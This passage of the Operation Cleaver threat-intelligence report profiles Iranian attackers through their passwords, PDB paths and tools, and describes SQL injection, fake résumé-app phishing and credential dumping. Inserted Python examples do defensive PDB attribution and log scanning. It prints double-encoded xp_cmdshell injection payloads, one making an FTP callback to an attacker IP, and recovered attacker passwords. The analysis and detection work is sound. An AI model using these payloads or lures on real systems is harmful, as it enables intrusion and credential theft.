  1159. Nesha shamelessly replaced the original author’s name with his own.
  1160.  
  1161. Nesha’s passwords very commonly include his own handle. His passwords were frequently stored as hashes in
  1162. backdoors, but common hash cracking methods were able to recover the plaintext versions. His observed
  1163. password use is as follows:
  1164.  
  1165. * nesha nesha used as password in ColdFusion backdoors
  1166. * NeshaNesha12 used as password in ASPX backdoors.
  1167. * nesha123 was found as a password in a recovered credential file with unknown association
  1168.  
  1169. Cylance observed Nesha participating in compromises involving the following techniques:
  1170.  
  1171. * SQL injection
  1172. * Web backdoors
  1173. * Cached credential dumping
  1174.  
  1175. Nesha has additionally been identified using a variety of internally developed tools as well as the
  1176. following publicly available tools:
  1177.  
  1178. * Cain & Abel
  1179. * PsExec
  1180. * PLink
  1181. * NetCat
  1182.  
  1183. Alireza
  1184.  
  1185. Alireza appears to be one of the senior developers of this organization. His tools are commonly
  1186. developed in C++, Java, and C# (desktop and ASPX). These tools are often support tools, either
  1187. monitoring the activity of other tools or supplementing the function of other tools gathering
  1188. information during the infiltration process. Alireza’s code appears to be reused internally on projects
  1189. such as TinyZBot. Alireza appears to be using a version control system for his code, and it is likely
  1190. that others are using the same system. Based on the paths, the version control system in use is likely
  1191. Apache’s Subversion. Use of a version control system is indicative of code sharing, but the use of an
  1192. older system like Subversion, along with other evidence, suggests there is not a large amount of
  1193. collaboration on projects and likely one developer working on each project at a time. This is not
  1194. behavior typical of a professional development team.
  1195.  
  1196. [ PG-27 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1197.  
  1202. Alireza (cont.)
  1203.  
  1204. Alireza’s C# tools include the following techniques:
  1205.  
  1206. *       Querying Windows Management Instrumentation Command-line (WMIC)
  1207. *       Cached credential dumping
  1208. *       Generating ASPX shells
  1209. *       Encryption
  1210. *       Process enumeration
  1211.  
  1212. Alireza’s Java tools include the following techniques:
  1213.  
  1214. *       HTTP communications
  1215. *       GUI development
  1216.  
  1217. Alireza’s C++ tools include the following techniques:
  1218.  
  1219. *       WinPcap interface
  1220. *       ARP poisoning
  1221. *       HTTP communications
  1222. *       SMB communications
  1223.  
  1224. PDBs
  1225.  
  1226. *       C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\IDCSercive\trunk\Release\kagent.pdb
  1227. *       C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\PcapServiceInstaller\Release\PcapServiceInstaller.pdb
  1229. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\AntiVirusDetectorConsole\AntiVirusDetectorConsole\obj\x86\Release\AntiVirusDetectorConsole.pdb
  1231. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\mimikatzWrapper\mimikatzWrapper\obj\x86\Debug\mimikatzWrapper.pdb
  1233. *       C:\Users\alireza\Documents\Visual Studio 2010\Projects\ShellCreator2\ShellCreator2\obj\x86\Debug\ShellCreator2.pdb
  1235. *       c:\Users\alireza\Documents\Visual Studio 2012\Projects\BackDoorLogger\BackDoorLogger\obj\Debug\BackDoorLogger.pdb
  1237.  
  1238.  
  1239. [ PG-28 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1240.  
  1245. kaJ
  1246.  
  1247. kaJ is a .NET developer, and has only been observed working in C#. He has less English language
  1248. proficiency than others in the organization, and likely has a supplemental role during compromises.
  1249. He has been observed developing tools which cater to specific challenges in a compromise. His notable
  1250. project was named Net Crawler, and a technical analysis of this tool can be found in the Tactics,
  1251. Techniques and Procedures section. Thanks to a recovered test configuration for Net Crawler, we were
  1252. able to determine that kaJ’s development computer has the name dev-castle, where he has the username
  1253. kaJ and the password oaolrJ@vad. kaJ is believed to be the creator of the Zhoupin ASCII art displayed
  1254. in Net Crawler.
  1255.  
  1256. kaJ’s projects include the following techniques.
  1257.  
  1258. *       Interfacing with multiple cached credential dumping tools
  1259. *       Interfacing with PsExec
  1260. *       Worming behavior
  1261.  
  1262. Jimbp
  1263.  
  1264. Jimbp is a .NET developer with minimal experience. His projects appear to be supplemental to TinyZBot
  1265. and are very simplistic. It is believed he is the developer of the project Binder_1. This project was
  1266. a simple malware binder which required manual configuration when compiling. His other work included
  1267. creating a new service wrapper for TinyZBot.
  1268.  
  1269. PDBs
  1270.  
  1271. *       c:\Users\Jimbp\Desktop\Binder_1\Binder_1\obj\x86\Release\Setup.pdb
  1272. *       c:\Users\Jimbp\Desktop\Binder_1 - for cleaver\Binder_1\obj\x86\Release\Setup.pdb
  1273. *       c:\Users\Jimbp\Documents\Visual Studio 2013\Projects\TestForInstallingService\TestForInstallingService\obj\Release\TestForInstallingService.pdb
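As an added example (not from the report), the grouping that underlies the PDB-based attribution in these member profiles: pull the account name, Visual Studio version, build configuration and version-control layout out of a set of PDB paths and cluster them per developer. The sample paths are the ones listed on this page with wrap artefacts removed; the function names are mine.

```python
import re
from collections import defaultdict

# "<drive>:\Users\<account>\...\<name>.pdb" as MSVC leaves it in a binary
PDB_PATH = re.compile(
    r"^(?P<drive>[A-Za-z]):\\Users\\(?P<account>[^\\]+)\\(?:.*\\)?(?P<file>[^\\]+\.pdb)$",
    re.IGNORECASE,
)
VS_VERSION = re.compile(r"Visual Studio (?P<year>\d{4})", re.IGNORECASE)
VCS_LAYOUT = re.compile(r"\\(trunk|branches|tags)\\", re.IGNORECASE)   # Subversion-style tree
BUILD_CONFIG = re.compile(r"\\(Debug|Release)\\", re.IGNORECASE)


def parse_pdb_path(path):
    """Extract the attribution-relevant pieces of one PDB path, or None."""
    m = PDB_PATH.match(path)
    if not m:
        return None
    vs = VS_VERSION.search(path)
    cfg = BUILD_CONFIG.search(path)
    return {
        "account": m.group("account").lower(),   # Windows paths are case-insensitive
        "project": m.group("file")[:-4],          # strip ".pdb"
        "vs_version": vs.group("year") if vs else None,
        "build_config": cfg.group(1).title() if cfg else None,
        "vcs_layout": bool(VCS_LAYOUT.search(path)),
    }


def profile_developers(paths):
    """Group parsed paths by account; sets become sorted lists for stable output."""
    acc = defaultdict(lambda: {"projects": set(), "vs_versions": set(),
                               "build_configs": set(), "vcs_layout": False})
    for p in paths:
        info = parse_pdb_path(p)
        if info is None:
            continue
        d = acc[info["account"]]
        d["projects"].add(info["project"])
        if info["vs_version"]:
            d["vs_versions"].add(info["vs_version"])
        if info["build_config"]:
            d["build_configs"].add(info["build_config"])
        d["vcs_layout"] = d["vcs_layout"] or info["vcs_layout"]
    return {a: {k: (sorted(v) if isinstance(v, set) else v) for k, v in d.items()}
            for a, d in acc.items()}


# PDB paths as listed in this section (wrap artefacts removed)
PDB_PATHS = [
    r"C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\Release\BotManager.pdb",
    r"C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\Release\socket-test.pdb",
    r"C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\Release\SendModule.pdb",
    r"C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\IDCSercive\trunk\Release\kagent.pdb",
    r"C:\Users\alireza\Documents\Visual Studio 2010\Projects\ShellCreator2\ShellCreator2\obj\x86\Debug\ShellCreator2.pdb",
    r"c:\Users\alireza\Documents\Visual Studio 2012\Projects\BackDoorLogger\BackDoorLogger\obj\Debug\BackDoorLogger.pdb",
    r"c:\Users\Jimbp\Desktop\Binder_1\Binder_1\obj\x86\Release\Setup.pdb",
    r"c:\Users\Jimbp\Documents\Visual Studio 2013\Projects\TestForInstallingService\TestForInstallingService\obj\Release\TestForInstallingService.pdb",
]

if __name__ == "__main__":
    for account, profile in profile_developers(PDB_PATHS).items():
        print(account, profile)
```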
  1275.  
  1276. [ PG-29 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1277.  
  1282. TEAMS
  1283.  
  1284. Of course many associated Iranian hacker teams have been identified in public and private security
  1285. circles. Some of the teams publicly known today include Iranian Cyber Army, Ashiyane, Islamic Cyber
  1286. Resistance Group, Izz ad-Din al-Qassam Cyber Fighters, Parastoo, Shabgard, Iran Black Hats and many
  1287. others [9].
  1288.  
  1289. However, even though the TTPs of the Cleaver team have some overlap with techniques used by Iranian Cyber
  1290. Army (botnets), Ashiyane (SQL injection) and Syrian Electronic Army (phishing and RATs), we believe
  1291. this is largely the work of a new team. Some connections to Ashiyane were discovered in our
  1292. investigations including a reference to hussein1363, who had prior ties to the hacker group.
  1293. Additional connections between team members and individuals exist but are predominantly speculative
  1294. and have only been shared with law enforcement.
  1295.  
  1296. Ultimately we believe the Cleaver team is a mix of existing team members and new recruits pulled
  1297. from the universities in Iran.
  1298.  
  1299.  
  1300. [ PG-30 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1301.  
  1306. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  1307. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  1308. %#%%%%%%%%@@@%%%@@#%%%%%%%%            TACTICS, TECHNIQUES       %@@@@#%%%%%%%%((%#&@%@@@@#%%%%%%%%
  1309. %@@@@#%%%%%%%%((%#&@ @@))%%               & PROCEDURES           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%
  1310. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
  1311. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  1312. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  1313. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  1314. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  1315. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  1316. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  1317. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  1318. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
  1319. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
  1320. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
  1321. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
  1322. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
  1323. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
  1324. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
  1325. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
  1326. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  1327. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  1328. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
  1329. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  1330. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  1331. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  1332. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  1333. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  1334. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  1335. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  1336. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  1337. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  1338. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  1339. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  1340. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  1341. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  1342. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  1343. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  1344. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  1345. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  1346. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  1347. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  1348. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  1349. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  1350. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  1351. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  1352. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  1353. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  1354. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  1355. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  1356. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  1357. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  1358. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  1359. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  1360. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  1361. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  1362. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  1363. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  1364. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  1365. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  1366. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  1367. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
  1368.  
  1369. [ PG-31 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1370.  
  1375. TACTICS, TECHNIQUES & PROCEDURES
  1376.  
  1377. The Cleaver campaign used a variety of methods in multiple stages of attacks. In this section we’ll
  1378. cover the commonly observed methods during different stages of the attack.
  1379.  
  1380.  
  1381. INITIAL COMPROMISE
  1382.  
  1383. The initial compromise gets the attackers their first foothold into the target network. Once the
  1384. ability to execute arbitrary code has been established, an attacker’s job becomes quite a bit easier.
  1385. Since the vector of initial compromise is usually determined by what is vulnerable on the target,
  1386. we’ll cover just a few of the techniques we’ve seen Operation Cleaver use to initiate the compromise.
  1387.  
  1388.  
  1389. SQL Injection
  1390.  
  1391. SQL injection is a very common and simple attack method. It is made possible when a vulnerable
  1392. application builds a SQL query from user input without validating or parameterizing it. SQL injection
  1393. payloads used by this organization have been double URL-encoded. Double encoding allows bypassing
  1394. various anti-exploitation filters, such as those supplied by Web Application Firewalls (WAFs), when the
  1395. inspecting layer decodes the request only once and the application behind it decodes it again.
  1396.  
  1397. The attackers would enable xp_cmdshell:
  1398.  
  1399. http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20show
  1400. advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_cmdshell;%20EXEC%20master.dbo.
  1401. sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20
  1402.  
  1403. Then connect outbound via anonymous FTP:
  1404.  
  1405. http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20
  1406. ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%20
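Each URL above is one request, wrapped across lines as in the PDF. Payloads like these are easy to miss if a filter decodes the request only once. The following is an added example, not code from the Cylance report or from the Cleaver toolset: a small Python checker that URL-decodes each logged request URI repeatedly, records how many rounds were actually needed, and matches the fully decoded text against the sp_configure / xp_cmdshell chain. The log lines, the plain-text form of the two payloads and the encode() helper are constructed for the example.

```python
"""Spot double-URL-encoded T-SQL stacked-query injection in web server logs.

Added example, not code from the Cylance report: the request URI of each log
line is URL-decoded repeatedly and the fully decoded query is checked for the
sp_configure / xp_cmdshell pattern the report describes. The log lines below
are constructed for this example.
"""
import re
from urllib.parse import quote, unquote_plus

# Markers of the stacked-query command-execution chain seen in the report.
MARKERS = {
    "stacked_declare": re.compile(r";\s*declare\s+@\w+", re.I),
    "sp_configure":    re.compile(r"\bsp_configure\b", re.I),
    "xp_cmdshell":     re.compile(r"\bxp_cmdshell\b", re.I),
    "reconfigure":     re.compile(r"\breconfigure\b", re.I),
}
MAX_ROUNDS = 3  # plain text needs 0, a browser-encoded request 1, the attackers' payloads 2

def decode_layers(uri, max_rounds=MAX_ROUNDS):
    """Return [uri, decoded_once, decoded_twice, ...], stopping as soon as a round
    changes nothing. len(result) - 1 is the encoding depth that was really present."""
    layers = [uri]
    for _ in range(max_rounds):
        nxt = unquote_plus(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers

def classify_uri(uri):
    """Return (depth, [marker names]) for one request URI. Markers are matched
    against the fully decoded text, so encoding cannot hide them."""
    layers = decode_layers(uri)
    decoded = layers[-1]
    hits = [name for name, rx in MARKERS.items() if rx.search(decoded)]
    return len(layers) - 1, hits

LOG_RX = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')

def scan_log(lines):
    """Return [(line_number, depth, markers)] for every line whose decoded URI
    carries at least one marker."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RX.search(line)
        if not m:
            continue
        depth, hits = classify_uri(m.group(1))
        if hits:
            findings.append((n, depth, hits))
    return findings

# --- constructed sample data ------------------------------------------------
# The report's two payloads written out as plain T-SQL, then encoded once (as a
# browser would) and twice (as the attackers did).
ENABLE_CMDSHELL = (
    "Edit&ID=111;declare @b1 varchar(8000);set @b1='show advanced options';"
    "declare @b2 varchar(8000);set @b2='xp_cmdshell';"
    "EXEC master.dbo.sp_configure @b1,1;RECONFIGURE;"
    "EXEC master.dbo.sp_configure @b2,1;RECONFIGURE;-- "
)
FTP_CALLBACK = (
    "Edit&ID=111;declare @b1 varchar(8000);set @b1='ftp -A 108.175.152.230';"
    "exec master..xp_cmdshell @b1-- "
)

def encode(payload, rounds):
    """URL-encode every non-alphanumeric byte, `rounds` times over."""
    for _ in range(rounds):
        payload = quote(payload, safe="")
    return payload

SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2013:10:01:22 +0000] "GET /Demos/demo.cfm?Edit&ID=111 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2013:10:01:40 +0000] "GET /Demos/demo.cfm?%s HTTP/1.1" 500 311' % encode(ENABLE_CMDSHELL, 1),
    '10.0.0.5 - - [12/Mar/2013:10:02:03 +0000] "GET /Demos/demo.cfm?%s HTTP/1.1" 200 311' % encode(ENABLE_CMDSHELL, 2),
    '10.0.0.5 - - [12/Mar/2013:10:02:30 +0000] "GET /Demos/demo.cfm?%s HTTP/1.1" 200 311' % encode(FTP_CALLBACK, 2),
]

if __name__ == "__main__":
    for n, depth, hits in scan_log(SAMPLE_LOG):
        print("line %d: encoding depth %d, markers %s" % (n, depth, ", ".join(hits)))
```

Feed real access-log lines to scan_log() the same way. A depth of 2 is itself worth an alert even before the marker match: browsers and normal clients encode once, so a request that only becomes readable after a second decode was built by hand.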
  1407.  
  1408. Spear-Phishing Campaign
  1409.  
  1410. Using messaging methods such as email, attackers can social engineer users into downloading and
  1411. executing software which quietly installs malware alongside the desired program. Operation
  1412. Cleaver has employed this technique numerous times across different organizations.
  1413.  
  1414. [ PG-32 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1415.  
  1419.  
  1420.  
  1421. EasyResumeCreatorPro.com
  1422.  
  1423. The domain EasyResumeCreatorPro.com was registered and a website was set up as a direct copy of
  1424. the legitimate site at winresume.com. This is how the original site looked:
  1425.  
  1426.  
  1427. [EWWW SCREENCAP!]
  1428.  
  1429. Figure 14: The original Easy Résumé Creator Pro website on winresume.com is legitimate.
  1430.  
  1431. [EWWW SCREENCAP!]
  1432.  
  1433. Figure 15: The fraudulent website, easyresumecreatorpro.com, is a copy of the Easy Resume Creator
  1434. Pro website, used to lure job candidates into downloading and installing the TinyZBot agent.
  1435.  
  1436. That’s not all they copied. In order to infect users, they combined the original Easy Resume Creator
  1437. Pro product with malware using a binder they developed internally, named Binder_1. A binder is an
  1438. application that combines two executables (the desired software and the malware) into a single executable.
  1439.  
  1440. The resulting executable masquerades as the desired software. The purpose is deception: the bound
  1441. executable should be indistinguishable from the legitimate application. When executed, both embedded
  1442. programs are written to a temporary directory and launched. The user sees the expected application
  1443. start, while the malware runs silently alongside it.
  1444.  
  1445. [ PG-33 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1446.  
  1450.  
  1451. Teledyne Résumé Submitter
  1452.  
  1453. [EWWW SCREENCAP!]
  1454.  
  1455. Figure 16: When the résumé submitting application is executed, a splash screen is displayed.
  1456.  
  1457. [EWWW SCREENCAP!]
  1458.  
  1459. Figure 17: Unable to connect to the Internet, the tool prompts the user for proxy configuration
  1460. information.
  1461.  
  1462. This attack evolved to appear more legitimate. The attackers made the victims feel like they had a
  1463. pending job opportunity at the industrial conglomerate Teledyne. In order to take advantage of this
  1464. job opportunity, the victim needed to use the fake résumé submission application supplied by the
  1465. malicious recruiter. Multiple domains were registered in order to make the download sites seem more
  1466. realistic. These domains impersonated other companies as well, to reach a wider audience:
  1467.  
  1468. *       Teledyne-Jobs.com
  1469. *       Doosan-Job.com
  1470. *       NorthropGrumman.net
  1471.  
  1472. At this point, the résumé submission application checks the Internet connection. If it is unable to
  1473. connect to the Internet, it will display a window to input proxy information.
  1474.  
  1475. When this information is entered, the results are cached in a location the dropped malware can access.
  1476. After an Internet connection is ensured, the malware (TinyZbot) is dropped and executed. This clever
  1477. scheme makes sure the malware can connect to the command and control server, and increases the
  1478. chances that domain credentials are cached on the now infected machine. Shortly after, the main
  1479. application is launched.
  1480.  
  1481.  
  1482. [EWWW SCREENCAP!]
  1483.  
  1484. Figure 18: Final résumé submission form displays to the user while the malware runs freely in the
  1485. background.
  1486.  
  1487. [ PG-34 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1488.  
  1492.  
  1493.  
  1494. Teledyne Résumé Submitter (cont.)
  1495.  
  1496. The first résumé submission form requests contact information. This form, like the rest of the
  1497. submission forms, only stores the submitted information while the application is running. As the
  1498. infected user is going through and filling out all this information, the malware is running in the
  1499. background, logging their keystrokes, retrieving their stored passwords, etc. Once all the forms are
  1500. filled out, the user goes to the submission form.
  1501.  
  1502.  
  1503. [EWWW SCREENCAP!]
  1504.  
  1505. Figure 19: GET request to www.microsoft.com fakes the résumé submission.
  1506.  
  1507.  
  1508.  
  1509. When the victim hits submit, the résumé submitter does a GET request to microsoft.com in order to make
  1510. it seem like it is submitting something, then claims success.
  1511.  
  1512. This method is particularly effective not only because of its level of deception, but even if the
  1513. victim suspects that they are infected with malware, they are not as likely to speak up about it,
  1514. as they would need to explain why they were submitting a job application for another company.
  1515.  
  1516. [ PG-35 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1517.  
  1521.  
  1522.  
  1523. PRIVILEGE ESCALATION & PIVOTING
  1524.  
  1525. Privilege escalation is a category of techniques that describe the process of going from a less
  1526. privileged user on a compromised computer to a more privileged user. This increase in privileges
  1527. allows the attacker to gain access to privileged areas of the operating system as well as to infect
  1528. other computers on the target network.
  1529.  
  1530. This team did not utilize any novel methods of privilege escalation, but they were observed using a
  1531. variety of publicly known exploits. PrivEsc is a compiled exploit that leverages the vulnerability
  1532. commonly referred to as KiTrap0D (CVE-2010-0232). The exploit allows escalation of privileges on
  1533. unpatched Windows operating systems from an unprivileged user to kernel-level privilege.
  1534.  
  1535.  
  1536. This vulnerability and the corresponding exploit were discovered and developed in 2010. The plagiarized
  1537. version used in Operation Cleaver was compiled in May 2013, with a slight modification to the public
  1538. source code. This modification changed the author’s details to Zhopin Exploit Team.
  1539.  
  1540. Pivoting is the process of leveraging access from one compromised computer in order to gain access to
  1541. additional systems on the target network. This can involve launching attacks from the compromised
  1542. computer, or simply abusing access once it has been gained.
  1543.  
  1544.  
  1545. Cached Credential Dumping
  1546.  
  1547. A very common method of pivoting on a predominantly Windows-based network is to extract domain
  1548. credentials that have been used on the compromised computer from its credential cache (LSASS memory).
  1549. There are a few well-known tools capable of doing this given sufficient privileges on the infected
  1550. host. Two of these tools used by Cleaver are Mimikatz and Windows Credential Editor.
  1551.  
  1552.  
  1553. zhMimikatz and MimikatzWrapper
  1554.  
  1555. Two similar applications were developed by Operation Cleaver in order to automate the execution
  1556. of Mimikatz. These applications are zhMimikatz and MimikatzWrapper. Both store multiple
